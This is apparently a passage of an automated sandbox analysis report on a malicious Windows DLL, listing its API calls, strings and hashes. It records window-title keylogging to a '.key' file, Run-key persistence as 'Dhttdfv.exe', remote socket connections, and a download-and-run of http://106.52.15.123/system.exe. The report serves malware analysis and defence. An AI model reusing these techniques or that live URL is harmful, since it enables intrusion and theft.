                                                                    • Function 1000A87A-1000AA00: the entry block 1000a87a-1000a902 calls LoadLibraryA and GetProcAddress six times; one path calls RegCreateKeyExA (1000a960-1000a97c) and, on one of its outcomes, RegOpenKeyExA (1000a97e-1000a993); the value is written via lstrlenA (1000a9b7-1000a9c5) and RegSetValueExA (1000a9c6-1000a9cd); all paths join at 1000a9db-1000a9e6 (call 1000aa06), then FreeLibrary (1000a9e8-1000a9e9) and return at 1000a9ef-1000aa00.
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,75A78400,00000000,?,1000AF24,1000D480,000000FF,\Services\%s,10005404,80000002,?,00000072,00000001,00000065,00000000), ref: 1000A8A7
                                                                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 1000A8BE
                                                                    • GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 1000A8C9
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000A8D4
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 1000A8DF
                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 1000A8EA
                                                                    • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000A8F5
                                                                    • RegCreateKeyExA.KERNEL32(?,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 1000A977
                                                                    • RegOpenKeyExA.KERNEL32(0002001F,00000000,00000000,0002001F,?), ref: 1000A98E
                                                                    • RegSetValueExA.KERNEL32(?,00000000,00000000,?,?,00000001), ref: 1000A9CD
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1000A9E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$CreateFreeLoadOpenValue
                                                                    • String ID: ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA$\Services\%s
                                                                    • API String ID: 554063521-3036171793
                                                                    • Opcode ID: c4a2985d78c2249bdba3fc027b41f981ced2e4ddd7b1e8fab8dbb935d79d5b04
                                                                    • Instruction ID: 1eb5c6dd000804f32785a3cffe8c18c6a7d0230b1f2800ff6d6850f5a7545d85
                                                                    • Opcode Fuzzy Hash: c4a2985d78c2249bdba3fc027b41f981ced2e4ddd7b1e8fab8dbb935d79d5b04
                                                                    • Instruction Fuzzy Hash: 9D410F71A0011DBFEF11DF95DC84EEE7BB8EF096D4F024226FA11A6164D7319C919B60

                                                                    Control-flow Graph

                                                                    • Control-flow graph of 10006fe0-10007104 (rendered image; node/edge dump and executed/not-executed legend omitted). Basic blocks call LoadLibraryA (x2), GetProcAddress (x4), CoInitialize and FreeLibrary (x2).
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(Ole32.dll,759183C0,00000000,00000001), ref: 10006FF4
                                                                    • GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 10007004
                                                                    • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 1000700F
                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 1000701A
                                                                    • LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,10007E35), ref: 10007024
                                                                    • GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 1000702F
                                                                    • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,10007E35), ref: 10007036
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,10007E35), ref: 100070F1
                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10007E35), ref: 100070FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryProc$FreeLoad$Initialize
                                                                    • String ID: CoCreateInstance$CoInitialize$CoUninitialize$FriendlyName$Ole32.dll$Oleaut32.dll$SysFreeString
                                                                    • API String ID: 1826426203-3340630095
                                                                    • Opcode ID: 389cadcfb6cb323307994a8851b306d3d9bf33a34bb4d3a446bcc0fb61cd25ac
                                                                    • Instruction ID: 49c363ad73918079f0f3afb1a7021305375387cfaa05218572d35b3f2b66e63c
                                                                    • Opcode Fuzzy Hash: 389cadcfb6cb323307994a8851b306d3d9bf33a34bb4d3a446bcc0fb61cd25ac
                                                                    • Instruction Fuzzy Hash: 00412C70E00219EFDB10DBA5CC88DEFBBB9FF88694B108559F505E7215DB75A901CBA0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000497F
                                                                    • strcat.MSVCRT(?,10012A68), ref: 10004991
                                                                    • strcat.MSVCRT(?,Default,?,10012A68), ref: 100049A2
                                                                    • strcat.MSVCRT(?,.key,?,Default,?,10012A68), ref: 100049B3
                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 100049D4
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 100049E2
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 100049F6
                                                                    • lstrlenA.KERNEL32(?), ref: 10004A05
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10004A0A
                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 10004A30
                                                                    • WriteFile.KERNEL32(?,00000000,00000000), ref: 10004A37
                                                                    • CloseHandle.KERNEL32(?), ref: 10004A40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$strcat$lstrlen$??2@CloseCreateDirectoryHandlePointerSizeSystemWrite
                                                                    • String ID: .key$Default
                                                                    • API String ID: 3208975923-1583214558
                                                                    • Opcode ID: 4a9a84d2db77241e225f3f2851328a80a9c70e429372d0f514ed70e2732cc4af
                                                                    • Instruction ID: 8db7b2cb8780ea1a752c5c57170ae7a29ec2482b675d31af14b714fd696e0164
                                                                    • Opcode Fuzzy Hash: 4a9a84d2db77241e225f3f2851328a80a9c70e429372d0f514ed70e2732cc4af
                                                                    • Instruction Fuzzy Hash: 6F2153B5900228BBEB10DBA4CC89FDE7F7DEB46390F504161F645E6056DB705E85CBA0

                                                                    Control-flow Graph

                                                                    • Control-flow graph of 10007289-100072fa (rendered image; node/edge dump and executed/not-executed legend omitted). Basic blocks call subroutine 1000712b, lstrlenA (x2) and lstrcpyA.
                                                                    APIs
                                                                      • Part of subcall function 1000712B: memset.MSVCRT ref: 10007157
                                                                      • Part of subcall function 1000712B: memset.MSVCRT ref: 10007169
                                                                      • Part of subcall function 1000712B: wsprintfA.USER32 ref: 1000720F
                                                                    • lstrlenA.KERNEL32(?,?,?,759183C0,00000100), ref: 100072E2
                                                                    • lstrcpyA.KERNEL32(?,Default,?,?,759183C0,00000100), ref: 100072EE
                                                                    • lstrlenA.KERNEL32(?,?,?,759183C0,00000100), ref: 100072F5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlenmemset$lstrcpywsprintf
                                                                    • String ID: C$Default$G$c$e$n$n$o$o$p$r$t$u
                                                                    • API String ID: 1346883434-148360246
                                                                    • Opcode ID: 7b9f11020c9a38ff0127635762f09269e694f158993faf986e64edac5c2f7f63
                                                                    • Instruction ID: a2785ca80c62f8d2e8f17244649445ab59a775b60a8b2fed68388d2ecc9b4b18
                                                                    • Opcode Fuzzy Hash: 7b9f11020c9a38ff0127635762f09269e694f158993faf986e64edac5c2f7f63
                                                                    • Instruction Fuzzy Hash: D6014410C082D8F9EB02D7A88808B9EBFB59F52648F0480D8D58466286C7BA5329C776
                                                                    APIs
                                                                      • Part of subcall function 1000712B: memset.MSVCRT ref: 10007157
                                                                      • Part of subcall function 1000712B: memset.MSVCRT ref: 10007169
                                                                      • Part of subcall function 1000712B: wsprintfA.USER32 ref: 1000720F
                                                                    • lstrlenA.KERNEL32(?,?,?,759183C0,00000000), ref: 10007344
                                                                    • lstrcpyA.KERNEL32(?,1001348C,?,?,759183C0,00000000), ref: 10007350
                                                                    • lstrlenA.KERNEL32(?,?,?,759183C0,00000000), ref: 10007357
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlenmemset$lstrcpywsprintf
                                                                    • String ID: M$T$a$e$i$k$m$r
                                                                    • API String ID: 1346883434-394501062
                                                                    • Opcode ID: 758bd59863ab867d02f0ac739eeb28c0c0cf3f15cf9d61a7406831dee3f063e2
                                                                    • Instruction ID: 219cb33504d48bea9b78a0e11c2c4c381b6ea61eb956ea9d1f4f52c5110286c3
                                                                    • Opcode Fuzzy Hash: 758bd59863ab867d02f0ac739eeb28c0c0cf3f15cf9d61a7406831dee3f063e2
                                                                    • Instruction Fuzzy Hash: 7EF08621D082C8FAEF0297A88C48BDE7FB99F52748F0480D9E95466143D3BA5629C776
                                                                    APIs
                                                                      • Part of subcall function 1000712B: memset.MSVCRT ref: 10007157
                                                                      • Part of subcall function 1000712B: memset.MSVCRT ref: 10007169
                                                                      • Part of subcall function 1000712B: wsprintfA.USER32 ref: 1000720F
                                                                    • lstrlenA.KERNEL32(?,10007C7D,?), ref: 10007272
                                                                    • gethostname.WS2_32(?,?), ref: 1000727C
                                                                    • lstrlenA.KERNEL32(?), ref: 10007283
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlenmemset$gethostnamewsprintf
                                                                    • String ID: H$o$s$t
                                                                    • API String ID: 713918090-2997942591
                                                                    • Opcode ID: ff66edb42a3f77dad9a39df39677ec2130cdafcac361e2011161291dac322d02
                                                                    • Instruction ID: 78a15c83ce98593eebf513f4d2a1a5e8de6aa53cd44efa4dc9344339ca77b845
                                                                    • Opcode Fuzzy Hash: ff66edb42a3f77dad9a39df39677ec2130cdafcac361e2011161291dac322d02
                                                                    • Instruction Fuzzy Hash: 53F0F621804288BAEB029B54CC04EEE7F79EB42684F048098F90462141D7796615C7B2
                                                                    APIs
                                                                    • memset.MSVCRT ref: 10004A65
                                                                    • GetForegroundWindow.USER32 ref: 10004A6D
                                                                    • GetWindowTextA.USER32(00000000,1001517C,00000400), ref: 10004A7B
                                                                    • lstrlenA.KERNEL32(1001517C), ref: 10004AAC
                                                                    • GetLocalTime.KERNEL32(?), ref: 10004ABA
                                                                    • wsprintfA.USER32 ref: 10004AEB
                                                                      • Part of subcall function 10004967: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000497F
                                                                      • Part of subcall function 10004967: strcat.MSVCRT(?,10012A68), ref: 10004991
                                                                      • Part of subcall function 10004967: strcat.MSVCRT(?,Default,?,10012A68), ref: 100049A2
                                                                      • Part of subcall function 10004967: strcat.MSVCRT(?,.key,?,Default,?,10012A68), ref: 100049B3
                                                                      • Part of subcall function 10004967: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 100049D4
                                                                      • Part of subcall function 10004967: GetFileSize.KERNEL32(00000000,00000000), ref: 100049E2
                                                                      • Part of subcall function 10004967: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 100049F6
                                                                      • Part of subcall function 10004967: lstrlenA.KERNEL32(?), ref: 10004A05
                                                                      • Part of subcall function 10004967: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10004A0A
                                                                      • Part of subcall function 10004967: lstrlenA.KERNEL32(?,?,00000000), ref: 10004A30
                                                                      • Part of subcall function 10004967: WriteFile.KERNEL32(?,00000000,00000000), ref: 10004A37
                                                                      • Part of subcall function 10004967: CloseHandle.KERNEL32(?), ref: 10004A40
                                                                    • memset.MSVCRT ref: 10004B07
                                                                    • memset.MSVCRT ref: 10004B10
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$lstrlenmemsetstrcat$Window$??2@CloseCreateDirectoryForegroundHandleLocalPointerSizeSystemTextTimeWritewsprintf
                                                                    • String ID:
                                                                    • API String ID: 3491631749-0
                                                                    • Opcode ID: 535d09471bceb3f937ff02d182abdf086c0613980c3f6dfee85f864d523c61f2
                                                                    • Instruction ID: 3195fd7b67cbd7dec8d2c359b7969c481bf291de447acad01657929a00bbec76
                                                                    • Opcode Fuzzy Hash: 535d09471bceb3f937ff02d182abdf086c0613980c3f6dfee85f864d523c61f2
                                                                    • Instruction Fuzzy Hash: 392130B1900228BAEB10DBA8CC85FEE77BCEB49385F104061F605E6181D6399A84CB75
                                                                    APIs
                                                                      • Part of subcall function 10001E14: setsockopt.WS2_32(?,0000FFFF,00000080,10008E5C,00000004), ref: 10001E39
                                                                      • Part of subcall function 10001E14: CancelIo.KERNEL32(?), ref: 10001E42
                                                                      • Part of subcall function 10001E14: InterlockedExchange.KERNEL32(?,00000000), ref: 10001E4E
                                                                      • Part of subcall function 10001E14: closesocket.WS2_32(?), ref: 10001E57
                                                                      • Part of subcall function 10001E14: SetEvent.KERNEL32(?), ref: 10001E60
                                                                    • ResetEvent.KERNEL32(?,?,1001211C,?), ref: 10001A56
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 10001A67
                                                                    • gethostbyname.WS2_32(?), ref: 10001A78
                                                                    • htons.WS2_32(?), ref: 10001A8D
                                                                    • connect.WS2_32(?,00000002,00000010), ref: 10001AAA
                                                                    • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 10001ACF
                                                                    • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 10001B00
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
                                                                    • String ID:
                                                                    • API String ID: 4281462294-0
                                                                    • Opcode ID: f8e17a7deb9375ed208706a515957b64ff9aed814561be85d6d67c71c794db8b
                                                                    • Instruction ID: aeabb0698825492ed866c5bdd6429c0fd0d9978ebf89e16c99f545c9a45479fe
                                                                    • Opcode Fuzzy Hash: f8e17a7deb9375ed208706a515957b64ff9aed814561be85d6d67c71c794db8b
                                                                    • Instruction Fuzzy Hash: D1215C71500358BFEB109FA4CC85EEBBBFCEF09394F104529F601A62A4D7B19E449B61
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10009517
                                                                    • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 10009532
                                                                    • RegSetValueExA.KERNEL32(?,Dhttdfv.exe,00000000,00000001,00000000,00000104), ref: 10009550
                                                                    • RegCloseKey.KERNEL32(?), ref: 10009559
                                                                    Strings
                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 10009528
                                                                    • Dhttdfv.exe, xrefs: 10009548
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseFileModuleNameOpenValue
                                                                    • String ID: Dhttdfv.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                                    • API String ID: 1392962279-2969673951
                                                                    • Opcode ID: b13d62c0c1ed68cc402453a4b87372e96c22c28e860dc255a138181a29fab07e
                                                                    • Instruction ID: 868615cf16300b1a4e589fb525f14928a153536476fa17c8de8ebe090884cf96
                                                                    • Opcode Fuzzy Hash: b13d62c0c1ed68cc402453a4b87372e96c22c28e860dc255a138181a29fab07e
                                                                    • Instruction Fuzzy Hash: B8F04F36A44228FBFB209755CC49FDA7B68EB54791F1000A1F744B50D5DAB09A84CA64
                                                                    APIs
                                                                      • Part of subcall function 100012F1: VirtualFree.KERNEL32(?,00000000,00008000,?,10001E82,759183C0,00000000,00000001,10007ED6,000000C8,0000022C), ref: 10001303
                                                                    • ??2@YAPAXI@Z.MSVCRT(10007ED6,759183C0,00000000,00000001,10007ED6,000000C8,0000022C), ref: 10001E8E
                                                                    • ??3@YAXPAX@Z.MSVCRT(0000022C,0000022C,10007ED6,10007ED6,00000004,10007ED6,00000004,000000C8,00000004,?,00000006,759183C0,00000000,00000001), ref: 10001EFD
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,0000022C,0000022C,10007ED6,10007ED6,00000004,10007ED6,00000004,000000C8,00000004,?,00000006,759183C0,00000000,00000001), ref: 10001F05
                                                                    • memcpy.MSVCRT(00000000,000000C8,00000001,00000001,0000022C,0000022C,10007ED6,10007ED6,00000004,10007ED6,00000004,000000C8,00000004,?,00000006,759183C0), ref: 10001F14
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,0000022C,00000001,00000004,000000C8,00000004,?,00000006,759183C0,00000000,00000001), ref: 10001F3C
                                                                    • memcpy.MSVCRT(00000000,000000C8,10007ED6,759183C0,00000000,00000001,10007ED6,000000C8,0000022C), ref: 10001EA6
                                                                      • Part of subcall function 1000104C: memcpy.MSVCRT(?,00000006,00000006,00000000,?,?,10001F51,?,00000006,759183C0,00000000,00000001,10007ED6,000000C8,0000022C), ref: 10001074
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy$??2@??3@$FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 494799333-0
                                                                    • Opcode ID: 27fbf78ed3b51c8556100a79185e8da1561c2a874bdeedc5818f2b3f8636b7cc
                                                                    • Instruction ID: 118d683cc8a4193673fd0bf7e6b98968ba6b74b9accbddda43626d6b07ee07ab
                                                                    • Opcode Fuzzy Hash: 27fbf78ed3b51c8556100a79185e8da1561c2a874bdeedc5818f2b3f8636b7cc
                                                                    • Instruction Fuzzy Hash: CF319379600204BBFF15EF64C982FEE77AAEF44380F404029F606A6186DFB4AA549B50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Tablefreemalloc
                                                                    • String ID:
                                                                    • API String ID: 4116887034-0
                                                                    • Opcode ID: a9a782163437b05ab3c8c7e16eab78436f4383197e630ce74bd1a5bb83864cc1
                                                                    • Instruction ID: 492090b11afa6ec3b5ee8b70b78e619307c4815bec6c8d30d93d8fc25b024389
                                                                    • Opcode Fuzzy Hash: a9a782163437b05ab3c8c7e16eab78436f4383197e630ce74bd1a5bb83864cc1
                                                                    • Instruction Fuzzy Hash: C7118236D01619BBF714C795DC81FDEB2ADEF442A0F210066E904E2184D7B4EE0146A4
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 1000956C
                                                                    • CoCreateGuid.OLE32(100095DD,?,100095DD), ref: 10009576
                                                                    • _snprintf.MSVCRT ref: 10009590
                                                                    • CoUninitialize.COMBASE(?,100095DD), ref: 10009599
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateGuidInitializeUninitialize_snprintf
                                                                    • String ID: %08X
                                                                    • API String ID: 61646808-3773563069
                                                                    • Opcode ID: 8ee7ab5f3f56983602ac466d3f439b31c02af002dc1d8de44b72d6b0248929f0
                                                                    • Instruction ID: 88d22e7365e1f16ed96490108e8fbffef4045e25b8fc80be152a820c222d597b
                                                                    • Opcode Fuzzy Hash: 8ee7ab5f3f56983602ac466d3f439b31c02af002dc1d8de44b72d6b0248929f0
                                                                    • Instruction Fuzzy Hash: 6DE02670A0433CBBFB00ABF84C0DF9A3A7CFB00682F404414FA15E6095D630D20087D5
                                                                    APIs
                                                                    • URLDownloadToFileA.URLMON(00000000,http://106.52.15.123/system.exe,C:\Program Files\Windows NT\system.exe,00000000,00000000), ref: 10009FD1
                                                                    • ShellExecuteA.SHELL32(00000000,open,C:\Program Files\Windows NT\system.exe,00000000,00000000,00000005), ref: 10009FE1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DownloadExecuteFileShell
                                                                    • String ID: C:\Program Files\Windows NT\system.exe$http://106.52.15.123/system.exe$open
                                                                    • API String ID: 2825088817-1113267039
                                                                    • Opcode ID: 9d3c8a4c5115a98b2d5ff1a06714790d8711211fbe8859f50e85129c60a7fa12
                                                                    • Instruction ID: a5bb377d1bd2513c596edfc13cbd7ce87bfd62707c7b4eda2b6f00193c169137
                                                                    • Opcode Fuzzy Hash: 9d3c8a4c5115a98b2d5ff1a06714790d8711211fbe8859f50e85129c60a7fa12
                                                                    • Instruction Fuzzy Hash: 9FD0C9329892A079E63097575C4DFEB9F3CCBE3FB2F01402EF608A909886645483C1B1
                                                                    APIs
                                                                    • setsockopt.WS2_32(?,0000FFFF,00000080,10008E5C,00000004), ref: 10001E39
                                                                    • CancelIo.KERNEL32(?), ref: 10001E42
                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 10001E4E
                                                                    • closesocket.WS2_32(?), ref: 10001E57
                                                                    • SetEvent.KERNEL32(?), ref: 10001E60
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                    • String ID:
                                                                    • API String ID: 1486965892-0
                                                                    • Opcode ID: 836b5f37c497276a5c177910c8051b1fe3d23b3599964cc5168669c5bb626d52
                                                                    • Instruction ID: 214bdb797ce9b3806abe695a8f89653cfa2cd86d3a48c32c0ca57aa75e999f02
                                                                    • Opcode Fuzzy Hash: 836b5f37c497276a5c177910c8051b1fe3d23b3599964cc5168669c5bb626d52
                                                                    • Instruction Fuzzy Hash: D5F05431110728EFEB209B95CC4EEC677B8FF05354F104518F782915F4D7B1A9449B50
                                                                    APIs
                                                                    • _ftol.MSVCRT ref: 100011DD
                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000006,?,?,?,?,?,10001063,00000000,?,?,10001F51,?), ref: 100011F1
                                                                    Memory Dump Source
